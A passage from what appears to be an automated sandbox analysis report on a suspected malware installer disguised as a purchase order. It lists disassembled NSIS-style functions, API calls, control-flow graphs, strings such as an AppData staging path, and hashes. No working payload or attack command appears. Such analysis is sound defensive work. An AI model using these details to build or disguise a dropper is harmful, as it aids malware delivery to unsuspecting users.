                • lstrlenW.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Local\efterplaprernes\Shakya\memorized,1033,007A1F48,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F48,00000000,00000002,76A13420), ref: 00403CCA
                • lstrcmpiW.KERNEL32(?,.exe,: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Local\efterplaprernes\Shakya\memorized,1033,007A1F48,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F48,00000000), ref: 00403CDD
                • GetFileAttributesW.KERNEL32(: Completed,?,00000000), ref: 00403CE8
                • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\efterplaprernes\Shakya\memorized), ref: 00403D31
                  • Part of subcall function 00406461: wsprintfW.USER32 ref: 0040646E
                • RegisterClassW.USER32(007A7A00), ref: 00403D6E
                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403D86
                • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403DBB
                • ShowWindow.USER32(00000005,00000000), ref: 00403DF1
                • GetClassInfoW.USER32(00000000,RichEdit20W,007A7A00), ref: 00403E1D
                • GetClassInfoW.USER32(00000000,RichEdit,007A7A00), ref: 00403E2A
                • RegisterClassW.USER32(007A7A00), ref: 00403E33
                • DialogBoxParamW.USER32(?,00000000,00403F77,00000000), ref: 00403E52
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.76393379189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.76393328316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393436615.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76394616110.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76394616110.00000000007C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76394616110.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO Tournefortian2453525525235235623425523235.jbxd
                Similarity
                • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                • String ID: .DEFAULT\Control Panel\International$.exe$1033$: Completed$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\efterplaprernes\Shakya\memorized$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                • API String ID: 1975747703-228176641
                • Opcode ID: 42423043095f590123d158157c9694ce3389b6048a27da8bb4fe5db052cf961f
                • Instruction ID: 5e1ff83f83eb9308ce16c84110d2fcc5f4f6a1078aae304d5a5647478e66a4f2
                • Opcode Fuzzy Hash: 42423043095f590123d158157c9694ce3389b6048a27da8bb4fe5db052cf961f
                • Instruction Fuzzy Hash: 0661A270240700BAD320AB669D45F2B3A6CEBC5B49F40853FF942B26E1DB7D9901CB6D
                Function 0040307D Relevance: 26.4, APIs: 5, Strings: 10, Instructions: 181memoryCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 324 40307d-4030cb GetTickCount GetModuleFileNameW call 40600a 327 4030d7-403105 call 40651a call 405e35 call 40651a GetFileSize 324->327 328 4030cd-4030d2 324->328 336 4031f0-4031fe call 403019 327->336 337 40310b 327->337 329 4032ad-4032b1 328->329 343 403200-403203 336->343 344 403253-403258 336->344 339 403110-403127 337->339 341 403129 339->341 342 40312b-403134 call 4034ac 339->342 341->342 349 40325a-403262 call 403019 342->349 350 40313a-403141 342->350 347 403205-40321d call 4034c2 call 4034ac 343->347 348 403227-403251 GlobalAlloc call 4034c2 call 4032b4 343->348 344->329 347->344 371 40321f-403225 347->371 348->344 375 403264-403275 348->375 349->344 353 403143-403157 call 405fc5 350->353 354 4031bd-4031c1 350->354 362 4031cb-4031d1 353->362 373 403159-403160 353->373 361 4031c3-4031ca call 403019 354->361 354->362 361->362 366 4031e0-4031e8 362->366 367 4031d3-4031dd call 4069d4 362->367 366->339 374 4031ee 366->374 367->366 371->344 371->348 373->362 377 403162-403169 373->377 374->336 378 403277 375->378 379 40327d-403282 375->379 377->362 380 40316b-403172 377->380 378->379 381 403283-403289 379->381 380->362 382 403174-40317b 380->382 381->381 383 40328b-4032a6 SetFilePointer call 405fc5 381->383 382->362 385 40317d-40319d 382->385 386 4032ab 383->386 385->344 387 4031a3-4031a7 385->387 386->329 388 4031a9-4031ad 387->388 389 4031af-4031b7 387->389 388->374 388->389 389->362 390 4031b9-4031bb 389->390 390->362
                APIs
                • GetTickCount.KERNEL32 ref: 0040308E
                • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exe,00000400), ref: 004030AA
                  • Part of subcall function 0040600A: GetFileAttributesW.KERNELBASE(?,004030BD,C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exe,80000000,00000003), ref: 0040600E
                  • Part of subcall function 0040600A: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406030
                • GetFileSize.KERNEL32(00000000,00000000,007B7000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exe,C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exe,80000000,00000003), ref: 004030F6
                • GlobalAlloc.KERNELBASE(00000040,?), ref: 0040322C
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.76393379189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.76393328316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393436615.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76394616110.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76394616110.00000000007C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76394616110.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO Tournefortian2453525525235235623425523235.jbxd
                Similarity
                • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                • String ID: 8]$<_$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                • API String ID: 2803837635-1024483750
                • Opcode ID: 228fa0226a90281b4f2baa84689300d30e54d034f1a820beff8a1dc93a475882
                • Instruction ID: 1f061f0c38a4f693c331b34270bc70c7c89456ffd71d5a2abe04866b7cb55e0c
                • Opcode Fuzzy Hash: 228fa0226a90281b4f2baa84689300d30e54d034f1a820beff8a1dc93a475882
                • Instruction Fuzzy Hash: 9551D071901204ABDB10AF65DD82B9E7FA8EB44756F10853BE501FA2C1CB7C8F418B5D
                Function 00406557 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 196stringCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 455 406557-406562 456 406564-406573 455->456 457 406575-40658b 455->457 456->457 458 4065a3-4065ac 457->458 459 40658d-40659a 457->459 461 4065b2 458->461 462 406787-406792 458->462 459->458 460 40659c-40659f 459->460 460->458 463 4065b7-4065c4 461->463 464 406794-406798 call 40651a 462->464 465 40679d-40679e 462->465 463->462 466 4065ca-4065d3 463->466 464->465 468 406765 466->468 469 4065d9-406616 466->469 470 406773-406776 468->470 471 406767-406771 468->471 472 406709-40670e 469->472 473 40661c-406623 469->473 474 406778-406781 470->474 471->474 475 406710-406716 472->475 476 406741-406746 472->476 477 406625-406627 473->477 478 406628-40662a 473->478 474->462 479 4065b4 474->479 480 406726-406732 call 40651a 475->480 481 406718-406724 call 406461 475->481 484 406755-406763 lstrlenW 476->484 485 406748-406750 call 406557 476->485 477->478 482 406667-40666a 478->482 483 40662c-406653 call 4063e8 478->483 479->463 496 406737-40673d 480->496 481->496 486 40667a-40667d 482->486 487 40666c-406678 GetSystemDirectoryW 482->487 500 4066f0-4066f4 483->500 502 406659-406662 call 406557 483->502 484->474 485->484 493 4066e6-4066e8 486->493 494 40667f-40668d GetWindowsDirectoryW 486->494 492 4066ea-4066ee 487->492 492->500 501 406701-406707 call 4067a1 492->501 493->492 499 40668f-406697 493->499 494->493 496->484 498 40673f 496->498 498->501 504 406699-4066a2 499->504 505 4066ae-4066c4 SHGetSpecialFolderLocation 499->505 500->501 506 4066f6-4066fc lstrcatW 500->506 501->484 502->492 512 4066aa-4066ac 504->512 510 4066e2 505->510 511 4066c6-4066e0 SHGetPathFromIDListW CoTaskMemFree 505->511 506->501 510->493 511->492 511->510 512->492 512->505
                APIs
                • GetSystemDirectoryW.KERNEL32(: Completed,00000400), ref: 00406672
                • GetWindowsDirectoryW.KERNEL32(: Completed,00000400,00000000,Completed,?), ref: 00406685
                • lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 004066FC
                • lstrlenW.KERNEL32(: Completed,00000000,Completed,?), ref: 00406756
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.76393379189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.76393328316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393436615.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76394616110.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76394616110.00000000007C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76394616110.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO Tournefortian2453525525235235623425523235.jbxd
                Similarity
                • API ID: Directory$SystemWindowslstrcatlstrlen
                • String ID: : Completed$Completed$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                • API String ID: 4260037668-905382516
                • Opcode ID: 0bfb1de96e7ab8e04267686189d0a2fdc9a7ea5f11b2228fd78f9f9797911f1b
                • Instruction ID: 9e459ffa4d797bbc81f49b8710fc234ac44c95668d32beb4df18aeb57a87e6f9
                • Opcode Fuzzy Hash: 0bfb1de96e7ab8e04267686189d0a2fdc9a7ea5f11b2228fd78f9f9797911f1b
                • Instruction Fuzzy Hash: E061D271900206AADF109F64DC40BAE37A5AF55318F22C13BE917B72D0DB7D8AA1CB5D
                Function 0040557C Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72stringwindowCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 513 40557c-405591 514 405597-4055a8 513->514 515 405648-40564c 513->515 516 4055b3-4055bf lstrlenW 514->516 517 4055aa-4055ae call 406557 514->517 519 4055c1-4055d1 lstrlenW 516->519 520 4055dc-4055e0 516->520 517->516 519->515 521 4055d3-4055d7 lstrcatW 519->521 522 4055e2-4055e9 SetWindowTextW 520->522 523 4055ef-4055f3 520->523 521->520 522->523 524 4055f5-405637 SendMessageW * 3 523->524 525 405639-40563b 523->525 524->525 525->515 526 40563d-405640 525->526 526->515
                APIs
                • lstrlenW.KERNEL32(Completed,00000000,00798D72,76A123A0), ref: 004055B4
                • lstrlenW.KERNEL32(?,Completed,00000000,00798D72,76A123A0), ref: 004055C4
                • lstrcatW.KERNEL32(Completed,?), ref: 004055D7
                • SetWindowTextW.USER32(Completed,Completed), ref: 004055E9
                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040560F
                • SendMessageW.USER32(?,0000104D,00000000,?), ref: 00405629
                • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405637
                  • Part of subcall function 00406557: lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 004066FC
                  • Part of subcall function 00406557: lstrlenW.KERNEL32(: Completed,00000000,Completed,?), ref: 00406756
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.76393379189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.76393328316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393436615.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76394616110.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76394616110.00000000007C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76394616110.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO Tournefortian2453525525235235623425523235.jbxd
                Similarity
                • API ID: MessageSendlstrlen$lstrcat$TextWindow
                • String ID: Completed
                • API String ID: 1495540970-3087654605
                • Opcode ID: e72b446f7cf09937869db058bf2a19fb3413a9df614dab038018dab8610e28cd
                • Instruction ID: aa9a416d1108715588902b7fd38edda494bf3b6dcc64e7638c7e5b3a5377cb21
                • Opcode Fuzzy Hash: e72b446f7cf09937869db058bf2a19fb3413a9df614dab038018dab8610e28cd
                • Instruction Fuzzy Hash: F7218071900518BACF119F69ED449CFBF79EF49750F10803AF944B62A0C7794A40CFA8
                Function 004032B4 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 161COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 527 4032b4-4032cb 528 4032d4-4032dd 527->528 529 4032cd 527->529 530 4032e6-4032eb 528->530 531 4032df 528->531 529->528 532 4032fb-403308 call 4034ac 530->532 533 4032ed-4032f6 call 4034c2 530->533 531->530 537 40349a 532->537 538 40330e-403312 532->538 533->532 539 40349c-40349d 537->539 540 403445-403447 538->540 541 403318-40333e GetTickCount 538->541 542 4034a5-4034a9 539->542 545 403487-40348a 540->545 546 403449-40344c 540->546 543 4034a2 541->543 544 403344-40334c 541->544 543->542 548 403351-40335f call 4034ac 544->548 549 40334e 544->549 550 40348c 545->550 551 40348f-403498 call 4034ac 545->551 546->543 547 40344e 546->547 552 403451-403457 547->552 548->537 561 403365-40336e 548->561 549->548 550->551 551->537 559 40349f 551->559 555 403459 552->555 556 40345b-403469 call 4034ac 552->556 555->556 556->537 564 40346b-403477 call 4060bc 556->564 559->543 563 403374-403394 call 406a42 561->563 569 40339a-4033ad GetTickCount 563->569 570 40343d-40343f 563->570 571 403441-403443 564->571 572 403479-403483 564->572 573 4033f8-4033fa 569->573 574 4033af-4033b7 569->574 570->539 571->539 572->552 577 403485 572->577 575 403431-403435 573->575 576 4033fc-403400 573->576 578 4033b9-4033bd 574->578 579 4033bf-4033f0 MulDiv wsprintfW call 40557c 574->579 575->544 582 40343b 575->582 580 403402-403409 call 4060bc 576->580 581 403417-403422 576->581 577->543 578->573 578->579 584 4033f5 579->584 587 40340e-403410 580->587 586 403425-403429 581->586 582->543 584->573 586->563 588 40342f 586->588 587->571 589 403412-403415 587->589 588->543 589->586
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.76393379189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.76393328316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393436615.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76394616110.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76394616110.00000000007C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76394616110.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO Tournefortian2453525525235235623425523235.jbxd
                Similarity
                • API ID: CountTick$wsprintf
                • String ID: ... %d%%$}Hy
                • API String ID: 551687249-2138383442
                • Opcode ID: 67e296ff4565807106035eaab5f2577f851fd332784b09125895019d099d7f68
                • Instruction ID: 2eef5f2140e491494c2db8857c7661a7403dfcbdcc622e4f150acafc5917097d
                • Opcode Fuzzy Hash: 67e296ff4565807106035eaab5f2577f851fd332784b09125895019d099d7f68
                • Instruction Fuzzy Hash: 59516C71800219EBDB11DF55DA84B9E7FB8AF40326F14417BE814BA2C1D7789F408BAA
                Function 00406877 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 590 406877-406897 GetSystemDirectoryW 591 406899 590->591 592 40689b-40689d 590->592 591->592 593 4068ae-4068b0 592->593 594 40689f-4068a8 592->594 596 4068b1-4068e4 wsprintfW LoadLibraryExW 593->596 594->593 595 4068aa-4068ac 594->595 595->596
                APIs
                • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040688E
                • wsprintfW.USER32 ref: 004068C9
                • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 004068DD
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.76393379189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.76393328316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393436615.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76394616110.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76394616110.00000000007C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76394616110.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO Tournefortian2453525525235235623425523235.jbxd
                Similarity
                • API ID: DirectoryLibraryLoadSystemwsprintf
                • String ID: %s%S.dll$UXTHEME$\
                • API String ID: 2200240437-1946221925
                • Opcode ID: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
                • Instruction ID: cdb972a85fe13f574061c7118b8c5d4b466341d866a79bb5796beb4354b5a6e3
                • Opcode Fuzzy Hash: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
                • Instruction Fuzzy Hash: E9F0F671511119A7DF10BB64DD0DF9B376CAF00305F11447AAA46F10E0EB7CDA68CBA8
                Function 00405A4B Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 597 405a4b-405a96 CreateDirectoryW 598 405a98-405a9a 597->598 599 405a9c-405aa9 GetLastError 597->599 600 405ac3-405ac5 598->600 599->600 601 405aab-405abf SetFileSecurityW 599->601 601->598 602 405ac1 GetLastError 601->602 602->600
                APIs
                • CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405A8E
                • GetLastError.KERNEL32 ref: 00405AA2
                • SetFileSecurityW.ADVAPI32(?,80000007,?), ref: 00405AB7
                • GetLastError.KERNEL32 ref: 00405AC1
                Strings
                • C:\Users\user\AppData\Local\Temp\, xrefs: 00405A71
                Memory Dump Source
                • Source File: 00000000.00000002.76393379189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.76393328316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393436615.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76394616110.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76394616110.00000000007C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76394616110.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO Tournefortian2453525525235235623425523235.jbxd
                Similarity
                • API ID: ErrorLast$CreateDirectoryFileSecurity
                • String ID: C:\Users\user\AppData\Local\Temp\
                • API String ID: 3449924974-3355392842
                • Opcode ID: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                • Instruction ID: 6b4cde1861b350949670c47dbaa51c368922036badf300449d23a0f4a4187d7a
                • Opcode Fuzzy Hash: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                • Instruction Fuzzy Hash: D0010871D10219EADF109BA0C984BEFBFB4EB04314F04853AD545B6180D77896488FA9
                Function 00406039 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 603 406039-406045 604 406046-40607a GetTickCount GetTempFileNameW 603->604 605 406089-40608b 604->605 606 40607c-40607e 604->606 608 406083-406086 605->608 606->604 607 406080 606->607 607->608
                APIs
                • GetTickCount.KERNEL32 ref: 00406057
